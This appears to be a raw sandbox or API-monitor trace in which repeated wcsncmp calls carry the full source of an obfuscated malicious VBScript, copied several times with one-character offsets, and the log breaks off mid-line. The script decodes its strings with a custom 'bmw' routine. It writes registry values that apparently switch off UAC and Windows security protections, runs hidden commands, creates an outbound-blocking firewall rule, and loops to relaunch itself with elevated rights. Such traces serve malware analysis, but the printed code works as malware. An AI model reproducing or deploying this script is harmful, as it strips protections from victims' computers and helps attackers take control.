bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.298] wcsncmp (_String1="s1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.298] wcsncmp (_String1="1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.298] wcsncmp (_String1=" = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.299] wcsncmp (_String1="= Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 